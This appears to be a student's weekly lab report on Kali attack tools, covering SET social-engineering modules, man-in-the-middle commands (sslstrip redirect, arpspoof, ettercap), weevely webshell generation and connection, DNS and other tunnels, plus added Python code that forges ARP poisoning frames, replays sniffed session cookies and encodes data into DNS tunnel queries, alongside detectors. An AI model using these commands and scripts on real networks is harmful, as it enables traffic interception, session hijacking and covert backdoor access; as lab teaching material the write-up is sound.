"The Eighth Week of Network Attack and Defense"

Construction and testing of the network attack and defense environment

The environment includes a Windows target machine, a Linux target machine, a Windows attack machine, and a Linux attack machine. The following picture shows the IP addresses of the four machines.

The following picture shows the connectivity test between the target machines and the attack machines:

Kali video learning:

Section 31: Exploitation with SET in Kali

The Social Engineering Toolkit (SET) is an open-source, Python-driven social engineering penetration testing tool that provides a very rich library of attack vectors. It is usually used together with Metasploit.
1. Enter setoolkit on the command line to open the SET suite.

2. Option 1 in the figure above is "Social-Engineering Attacks". Enter 1 and press Enter to see the corresponding modules.



The meaning of the 11 items in the figure is as follows.

Obviously, on my Kali the second top-level option is the Fast-Track penetration testing framework.
3. Spear-phishing attack
Sends a targeted e-mail carrying a malicious attachment.

4. Website attack
Clones or hosts a web page that delivers the payload (credential harvesting, Java applet, browser exploit).

5. Infectious media generator
Generates removable media with an autorun.inf that launches the exploit payload and returns a shell; it can also be combined with a Metasploit backdoor.
6. Create a payload and listener
Uses the current IP address as the reverse-connection address; pressing Enter lists the available payloads.
7. Mass mailer attack

8. Arduino-based attack

9. SMS spoofing attack

10. Wireless access point attack
Creates a rogue wireless access point; the traffic of every device that connects to it can be captured.

11. QR code attack
Embeds a malicious URL in a QR code, so that whoever scans the code automatically visits the page.

12. PowerShell attack
13. Third-party modules
14. Fast-Track module

Section 32: Sniffing, spoofing and man-in-the-middle attacks in Kali


To carry out a man-in-the-middle attack, the methods below cover ARP spoofing, DNS spoofing and sniffing, and session hijacking.
1. Enable IP forwarding on Kali, so that traffic redirected through the attack machine still reaches its real destination:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. sslstrip
To hijack SSL traffic, HTTPS has to be downgraded to HTTP. Redirect incoming port-80 traffic to the port sslstrip will listen on:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081
Then let sslstrip listen on port 8081:
sslstrip -l 8081
Note that sslstrip only works against sites the browser is willing to load over plain HTTP; sites protected by HSTS (in particular preloaded ones) cannot be downgraded this way.

3. Preparing ettercap
ettercap is a man-in-the-middle toolkit in the same category as the dsniff suite. Its strength is that it supports plug-ins and filter scripts, and it displays account names and passwords directly without manual data extraction. If this is the first man-in-the-middle operation, ettercap has to be configured under Kali first.
The configuration file is /etc/ettercap/etter.conf. First, change both ec_uid and ec_gid to 0:

After the modification the file looks as shown in the figure. It can be opened and saved directly from the file manager.

Then, under the "Linux" category, find the "if you use iptables" lines, remove the comment (#) as above, and enable forwarding.

Open the graphical interface as follows:


4. Using ettercap
Open ettercap, select Sniff -> Unified sniffing -> choose the network card -> Hosts: first scan for hosts, then open the host list after the scan.

Embarrassingly, five hosts showed up in the host list. Network conditions were such that I could not log in at all.

5. The dsniff suite
The dsniff suite consists mainly of arpspoof and dsniff. The former does ARP spoofing, the latter does sniffing. The attack steps are as follows.
Perform ARP spoofing (usage from the arpspoof man page):
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-c selects which hardware address is used when the ARP tables are restored on exit (usually both); -t is the victim; -r also poisons the host (typically the gateway) so that both directions of the traffic pass through the attacker. Then sniff the redirected traffic:
dsniff [-i interface | -p pcapfile] [-r|-w savefile] [expression]
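The frame arpspoof sends is an unsolicited ARP reply that claims the gateway's IP with the attacker's MAC. The block below is an added example (not code from the course or from the dsniff project): it builds that reply byte by byte, parses it back, and runs a minimal arpwatch-style detector over a legitimate reply followed by the poisoned one. The MAC and IP addresses are constructed for illustration and are not the ones in the lab figures above.

```python
"""Forge the ARP reply that arpspoof sends, and detect it on the wire.

Added example, not from the course or the dsniff project. The MAC and IP
addresses are constructed for illustration.
"""
import struct

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an unsolicited ARP reply (opcode 2).

    To poison the victim, the attacker puts its own MAC as sender_mac and the
    gateway's IP as sender_ip; the victim's cache then maps the gateway IP to
    the attacker's MAC. This is what `arpspoof -t victim gateway` emits.
    """
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    # hardware type Ethernet(1), protocol IPv4(0x0800), hlen 6, plen 4, opcode reply
    arp_header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp_body = (mac_bytes(sender_mac) + ip_bytes(sender_ip)
                + mac_bytes(target_mac) + ip_bytes(target_ip))
    return ethernet + arp_header + arp_body


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }


class ArpWatch:
    """Minimal arpwatch: remember the first MAC seen for each IP and alert
    when a later ARP packet claims the same IP with a different MAC."""

    def __init__(self):
        self.table = {}

    def observe(self, frame: bytes):
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.setdefault(ip, mac)  # first sighting is trusted
        if known != mac:
            return f"ARP mapping for {ip} changed {known} -> {mac} (opcode {arp['opcode']})"
        return None


if __name__ == "__main__":
    GATEWAY_IP, GATEWAY_MAC = "192.168.56.1", "08:00:27:00:00:01"    # constructed
    VICTIM_IP, VICTIM_MAC = "192.168.56.20", "08:00:27:00:00:20"     # constructed
    ATTACKER_MAC = "08:00:27:00:00:66"                                # constructed
    watch = ArpWatch()
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoofed = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    print(watch.observe(legit))    # None: first mapping is recorded
    print(watch.observe(spoofed))  # alert: gateway IP now claimed by the attacker's MAC
```

Feeding the raw bytes of `build_arp_reply` to a raw socket on the attack machine's interface reproduces arpspoof's behaviour; running `ArpWatch.observe` over frames from a capture on the victim's segment is the corresponding detection. The detector trusts the first mapping it sees, so it must be started before the attack begins, which is also arpwatch's limitation.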
6. Session hijacking
Here cookies are used as the example to illustrate session hijacking: once a session cookie has been sniffed from plain HTTP traffic, presenting it in a new request takes over the session without knowing the password.
7. Picture interception
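As an added example for the cookie-based session hijacking above (not code from the course), the block below takes a constructed HTTP request and response of the kind dsniff or sslstrip would see on port 80, pulls the cookies out of the request, builds the replayed request that hijacks the session, and, on the defender's side, lists the cookies the server set without the Secure attribute. The host, path and cookie values are made up.

```python
"""Pull a session cookie out of sniffed HTTP and replay it.

Added example, not from the course. The request and response below are
constructed samples; the host, path and cookie values are made up.
"""

SNIFFED_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: PHPSESSID=8f3a9c21d4e5b6a7; theme=dark\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)

SNIFFED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: PHPSESSID=8f3a9c21d4e5b6a7; Path=/; HttpOnly\r\n"
    b"Set-Cookie: csrftoken=0b1c2d3e; Path=/; Secure; HttpOnly\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def split_message(raw: bytes):
    """Split an HTTP/1.1 message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def extract_cookies(raw_request: bytes) -> dict:
    """Collect every cookie the client sent, from all Cookie headers."""
    _, headers, _ = split_message(raw_request)
    jar = {}
    for name, value in headers:
        if name != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key:
                jar[key] = val
    return jar


def request_host(raw_request: bytes) -> str:
    _, headers, _ = split_message(raw_request)
    return dict(headers).get("host", "")


def build_replay(host: str, path: str, jar: dict) -> bytes:
    """Hijack: a fresh request presenting the stolen cookies, no password needed."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in jar.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\nConnection: close\r\n\r\n").encode()


def cookies_without_secure(raw_response: bytes) -> list:
    """Defender's check: names of cookies set without the Secure attribute.
    Such cookies are sent over plain HTTP, which is exactly what lets the
    sslstrip downgrade capture them; HttpOnly does not help against sniffing."""
    _, headers, _ = split_message(raw_response)
    exposed = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].partition("=")[0]
        attributes = {p.lower() for p in parts[1:]}
        if "secure" not in attributes:
            exposed.append(cookie_name)
    return exposed


if __name__ == "__main__":
    stolen = extract_cookies(SNIFFED_REQUEST)
    print(build_replay(request_host(SNIFFED_REQUEST), "/account", stolen).decode())
    print("cookies sent over plain HTTP:", cookies_without_secure(SNIFFED_RESPONSE))
```

The replay only works while the server-side session is alive and the server does not bind the session to the client address or TLS channel; the Secure check is the quickest way to confirm whether a site's session cookie would survive the downgrade in step 2.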

Section 33: Persistence backdoors

Persistence covers three sub-classes: the Tunnel toolset, web backdoors, and system backdoors. System backdoors and web backdoors are collectively called backdoors: malicious programs left behind after a penetration test to make re-entry into the system easy.
1. Weevely, a web backdoor
Weevely is a webshell tool written in Python that integrates webshell generation and connection (for security learning and teaching only; illegal use is prohibited). It can be regarded as a China Chopper replacement under Linux (PHP only); some modules are not available on Windows. All in all, it is a good tool.
Generate a PHP backdoor with weevely generate test ~/1.php, where test is the password; the agent is written to ~/1.php locally. Once the file has been uploaded to the target web root, connect to it with weevely http://target/1.php test (target being the victim's host name).

Section 34: Tunnels for persistence in Kali

Persistence covers three sub-classes: the Tunnel toolset, web backdoors, and system backdoors. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies.


1. CryptCat
Netcat is known as the Swiss Army knife of network tools; CryptCat is a Netcat variant that encrypts the connection with Twofish.
2. DNS2TCP
A DNS tunnel uses DNS queries and responses as the channel for transmitting data; dns2tcp forwards TCP connections through such a tunnel.
3. Iodine
Tunnels IPv4 traffic over DNS, usable wherever only DNS resolution is allowed out of the network.
4. Miredo
Miredo is a Teredo client and relay for BSD and Linux that tunnels IPv6 over IPv4 UDP, giving IPv6 connectivity to hosts on networks that do not support it. It requires IPv6 and TUN support in the kernel.
5. Proxychains
A tool frequently used in intranet penetration testing. For example, after opening a Socks4a proxy with Meterpreter, add the proxy to /etc/proxychains.conf and other tools such as sqlmap and nmap can then be run through it to scan the intranet.
6. Proxytunnel
Proxytunnel connects to a remote server through a standard HTTP(S) proxy (using the CONNECT method), bridging the connection; it is especially useful for carrying SSH over an HTTP(S) proxy.
7. Ptunnel
Establishes a tunnel over ICMP echo packets.
8. pwnat
Lets hosts that are both behind NAT communicate with each other over UDP.
9. Socat
Can forward data between different protocols and address types.
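The DNS tunnel tools above (DNS2TCP, Iodine) all rest on the same trick: data goes out as the label part of queries for names under a zone the attacker controls, so the attacker's nameserver receives it. The block below is an added example of that principle (not the wire format of either tool, and not code from the course): it base32-encodes payload bytes, splits them into labels that respect the DNS limits of 63 characters per label and 253 per name, prefixes a sequence label, and reassembles the payload on the server side even when queries arrive out of order. The zone name t.example is a placeholder.

```python
"""How a DNS tunnel carries data: the principle behind dns2tcp and iodine.

Added example, not the wire format of either tool. DNS is case-insensitive,
so base64 would not survive case-folding resolvers; base32 is used instead.
"""
import base64

TUNNEL_ZONE = "t.example"   # hypothetical zone whose nameserver is the tunnel endpoint
CHUNK_BYTES = 100           # 100 bytes -> 160 base32 chars -> 3 labels, well under 253 total
LABEL_MAX = 63              # RFC 1035 label limit
NAME_MAX = 253              # RFC 1035 limit on the textual name


def _b32(data: bytes) -> str:
    # padding carries no information and '=' is not valid in a hostname, so drop it
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_query(seq: int, chunk: bytes) -> str:
    """One query name: s<sequence>.<data labels...>.<zone>.
    The sequence label also makes every name unique, so resolver caches never
    answer a query before it reaches the tunnel server."""
    if len(chunk) > CHUNK_BYTES:
        raise ValueError("chunk too large for one query")
    encoded = _b32(chunk)
    labels = [encoded[i:i + LABEL_MAX] for i in range(0, len(encoded), LABEL_MAX)]
    name = ".".join([f"s{seq}", *labels, TUNNEL_ZONE])
    if len(name) > NAME_MAX:
        raise ValueError("name exceeds DNS limit")
    return name


def decode_query(name: str):
    """Server side: recover (sequence, chunk) from a received query name."""
    suffix = "." + TUNNEL_ZONE
    if not name.endswith(suffix):
        raise ValueError("query is not for the tunnel zone")
    labels = name[:-len(suffix)].split(".")
    seq = int(labels[0][1:])
    return seq, _unb32("".join(labels[1:]))


def to_queries(payload: bytes) -> list:
    """Client side: split a payload into the query names to send."""
    return [encode_query(i, payload[off:off + CHUNK_BYTES])
            for i, off in enumerate(range(0, len(payload), CHUNK_BYTES))]


def from_queries(names) -> bytes:
    """Reassemble in sequence order; queries may arrive out of order or duplicated."""
    chunks = {}
    for name in names:
        seq, chunk = decode_query(name)
        chunks[seq] = chunk
    return b"".join(chunks[seq] for seq in sorted(chunks))


if __name__ == "__main__":
    sample = b"id\nuid=0(root) gid=0(root)\n"   # constructed payload
    for query in to_queries(sample):
        print(query)
    print(from_queries(to_queries(sample)) == sample)
```

The downstream direction works the same way in reverse, with the server packing data into the answer records (TXT or NULL). The long, high-entropy labels and the query volume are also what a defender's DNS logging looks for when hunting for such tunnels.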

Section 35: Reverse engineering tools in Kali


1. edb
A graphical debugger for Linux binaries.

2. OllyDbg
A user-mode debugger for Windows executables.

3. jad
A decompilation tool for Java class files.

5. REC Studio
A decompilation tool for native executables.

6. apktool
Unpacks and repacks Android APKs (resources and smali code).

7. clang, clang++
C and C++ compilers.

8. d2j-dex2jar
Converts dex files into jar files, after which other tools can be used to view the source code.

9. flasm
A disassembler and assembler for Flash SWF bytecode.

10. JavaSnoop
Attaches to a running Java application to intercept and modify method calls.
